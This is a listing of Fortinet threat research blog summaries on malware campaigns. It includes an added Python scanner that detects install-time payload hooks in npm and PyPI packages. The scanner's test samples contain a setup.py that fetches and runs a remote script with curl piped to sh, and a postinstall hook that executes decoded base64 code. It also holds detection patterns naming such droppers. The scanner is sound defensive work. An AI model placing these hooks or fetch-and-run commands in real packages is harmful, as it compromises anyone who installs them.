SEO Poisoning Attack Targets Chinese-Speaking Users…
FortiGuard Labs uncovered an SEO poisoning campaign that lures Chinese-speaking users to fake software sites delivering the Hiddengh0st and Winos malware families.
Tag: Fortinet Threat Research Blog
MostereRAT Deployed AnyDesk/TightVNC for Covert Full Access
FortiGuard Labs details how MostereRAT combines phishing, code written in EPL (Easy Programming Language), and legitimate remote access tools such as AnyDesk and TightVNC to evade defenses and gain full control of the victim's system.
Phishing Campaign Targeting Companies via UpCrypter
FortiGuard Labs uncovers a phishing campaign that uses spoofed emails and the UpCrypter loader to deliver RATs such as PureHVNC and DCRat to organizations across multiple industries.
The Resurgence of IoT Malware: Inside the Mirai-Based “Gayfemboy” Botnet Campaign
FortiGuard Labs analyzes the Gayfemboy botnet, a Mirai-based variant targeting multiple sectors worldwide: its tactics, its C2 methods, and the Fortinet protections against it.
From ClickFix to Command: A Full PowerShell Attack Chain
A regionally targeted PowerShell-based campaign used ClickFix-style phishing lures, obfuscation, and RAT delivery to infiltrate Israeli organizations. Learn how the attack chain worked and how Fortinet blocked it.
Unveiling a New Variant of the DarkCloud Campaign
FortiGuard Labs has uncovered a stealthy new variant of DarkCloud malware that chains phishing emails, obfuscated JavaScript, PowerShell loaders, and process hollowing to exfiltrate credentials, payment data, and email contacts, all without dropping a file to disk.
Malicious Packages Across Open-Source Registries: Detection Statistics and Trends (Q2 2025)
Malware continues to infiltrate open-source software registries. FortiGuard Labs' Q2 2025 analysis shows the tactics that persist in malicious npm and PyPI packages, including credential theft, obfuscation, and install-time payloads. Learn how threat actors exploit OSS and how to stay…
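The install-time payloads mentioned in that entry ride on hooks that package managers run automatically: npm lifecycle scripts such as `preinstall`/`postinstall`, and setuptools command overrides (`cmdclass`) in a PyPI package's `setup.py`. The scanner below is an added example, not FortiGuard Labs' detection logic; the indicator lists are assumptions chosen for illustration, and both sample manifests are constructed (the base64 blob in the npm sample decodes to the harmless command `echo pwned`).

```python
"""Heuristic scanner for install-time payload hooks in npm and PyPI packages.

Added illustration of the install-time tactic described above. This is not
FortiGuard Labs' detection logic; indicator lists and sample manifests are
constructed for the example.
"""
import ast
import json
import re

# npm lifecycle scripts that run automatically during `npm install`.
NPM_INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# setuptools command classes a malicious setup.py commonly subclasses so that
# attacker code runs during `pip install` (assumed indicator list).
SETUPTOOLS_HOOK_BASES = {"install", "develop", "egg_info", "build_py"}

# Heuristic dropper indicators for a shell or inline command (assumed list).
SUSPICIOUS_COMMAND_PATTERNS = [
    (re.compile(r"curl\b[^|]*\|\s*(sh|bash)\b"), "remote script piped to a shell"),
    (re.compile(r"\bwget\b"), "remote fetch with wget"),
    (re.compile(r"\bnode\s+-e\b"), "inline Node.js code"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "base64 decoding"),
    (re.compile(r"Buffer\.from\([^)]*base64"), "base64 decoding in JavaScript"),
    (re.compile(r"\beval\("), "eval"),
    (re.compile(r"child_process"), "child_process module"),
    (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b"), "URL with a raw IP address"),
]

# Python calls a setup.py has no legitimate reason to make (assumed list).
SUSPICIOUS_PY_CALLS = {
    "os.system", "subprocess.run", "subprocess.call", "subprocess.Popen",
    "subprocess.check_output", "exec", "eval", "urllib.request.urlopen",
    "base64.b64decode",
}


def scan_command(cmd):
    """Return the indicator descriptions that match one script command."""
    return [why for pat, why in SUSPICIOUS_COMMAND_PATTERNS if pat.search(cmd)]


def scan_npm_manifest(package_json_text):
    """Flag install-time lifecycle scripts in a package.json.

    Every install hook is reported, since its mere presence deserves review;
    'reasons' lists which dropper indicators its command matched.
    """
    scripts = json.loads(package_json_text).get("scripts") or {}
    return [
        {"hook": hook, "command": cmd, "reasons": scan_command(cmd)}
        for hook, cmd in scripts.items()
        if hook in NPM_INSTALL_HOOKS
    ]


def scan_setup_py(setup_py_source):
    """Flag setuptools command overrides and dangerous calls in a setup.py."""
    findings = []
    for node in ast.walk(ast.parse(setup_py_source)):
        if isinstance(node, ast.ClassDef):
            # `install` and `setuptools.command.install.install` both count.
            bases = [ast.unparse(b).rsplit(".", 1)[-1] for b in node.bases]
            hooked = sorted(set(bases) & SETUPTOOLS_HOOK_BASES)
            if hooked:
                findings.append(f"line {node.lineno}: class {node.name} "
                                f"overrides setuptools command(s) {hooked}")
        elif isinstance(node, ast.Call):
            name = ast.unparse(node.func)
            if name in SUSPICIOUS_PY_CALLS:
                findings.append(f"line {node.lineno}: call to {name}")
            elif name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(f"line {node.lineno}: setup() registers a custom cmdclass")
    return findings


# Constructed sample: postinstall decodes and executes a base64 blob
# ('ZWNobyBwd25lZA==' is just 'echo pwned').
MALICIOUS_PACKAGE_JSON = json.dumps({
    "name": "left-padd", "version": "1.0.3",
    "scripts": {
        "postinstall": "node -e \"require('child_process').exec("
                       "Buffer.from('ZWNobyBwd25lZA==','base64').toString())\"",
        "test": "jest",
    },
})
BENIGN_PACKAGE_JSON = json.dumps({
    "name": "left-pad", "version": "1.3.0",
    "scripts": {"test": "jest", "build": "tsc"},
})

# Constructed sample: a setup.py that hooks the install command to fetch
# and run a remote script (203.0.113.7 is a documentation-only address).
MALICIOUS_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.run(["sh", "-c", "curl http://203.0.113.7/x.sh | sh"])

setup(name="requests-util", version="0.1", cmdclass={"install": PostInstall})
'''
BENIGN_SETUP_PY = '''
from setuptools import setup, find_packages
setup(name="goodlib", version="1.0", packages=find_packages())
'''

if __name__ == "__main__":
    for label, text in (("malicious", MALICIOUS_PACKAGE_JSON), ("benign", BENIGN_PACKAGE_JSON)):
        print(f"npm {label}: {scan_npm_manifest(text)}")
    for label, src in (("malicious", MALICIOUS_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(f"pypi {label}: {scan_setup_py(src)}")
```

The npm side reports every install hook, not only the ones matching an indicator, because a hook that merely runs a second-stage script is exactly how most of these packages stay unremarkable at a glance; the PyPI side treats a `cmdclass` registration or a subclass of a setuptools command as review-worthy on its own, and separately reports the call sites that do the actual work.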
Inside The ToolShell Campaign
FortiGuard Labs uncovers ToolShell, a sophisticated exploit chain targeting Microsoft SharePoint servers that mixes patched and zero-day CVEs. Learn how attackers deploy GhostWebShell and KeySiphon for stealthy remote code execution and credential theft.
In-Depth Analysis of an Obfuscated Web Shell Script
Detailed analysis of an obfuscated web shell used in an attack on critical national infrastructure (CNI): its structure, its traffic patterns, and Fortinet's detection and protection.
A Special Mission to Nowhere
Following the Israel-Iran ceasefire, FortiGuard Labs uncovered a phishing campaign posing as a private jet evacuation service from Tel Aviv to New York. Learn how the attackers used crisis-driven fear to steal personal and financial data.
NailaoLocker Ransomware’s “Cheese”
FortiGuard Labs analyzes NailaoLocker ransomware, an unusual variant that uses the SM2 public-key algorithm for encryption and ships with a built-in decryption function. Learn how it works, why it matters, and how Fortinet protects against it.
Improving Cloud Intrusion Detection and Triage with FortiCNAPP Composite Alerts
FortiCNAPP Composite Alerts link weak signals into clear timelines, helping security teams detect cloud-native threats earlier and triage them faster.
Old Miner, New Tricks
FortiCNAPP Labs uncovers Lcrypt0rx, a likely AI-generated ransomware variant used in updated H2Miner campaigns that target cloud resources for Monero mining.
How FortiSandbox 5.0 Detects Dark 101 Ransomware Despite Evasion Techniques
Discover how FortiSandbox 5.0 detects Dark 101 ransomware despite its sandbox evasion tactics, and how behavioral analysis blocks its file encryption, system tampering, and ransom note deployment.
Catching Smarter Mice with Even Smarter Cats
Explore how AI is changing the cat-and-mouse dynamic of cybersecurity, from cracking obfuscation and legacy languages to analyzing new malware built with Flutter, Rust, and Delphi.
NordDragonScan: Quiet Data-Harvester on Windows
FortiGuard Labs explores how NordDragonScan, a data-harvesting malware for Windows, is spread through an effective distribution network.
DCRAT Impersonating the Colombian Government
A threat actor impersonates the Colombian government to deliver DCRAT via phishing email, using obfuscation, steganography, and PowerShell payload chains.
Dissecting a Malicious Havoc Sample
Explore a detailed technical analysis of a Havoc Remote Access Trojan (RAT) variant used in a targeted cyberattack against Middle East critical national infrastructure, and learn how Fortinet detects and protects against Havoc-based threats.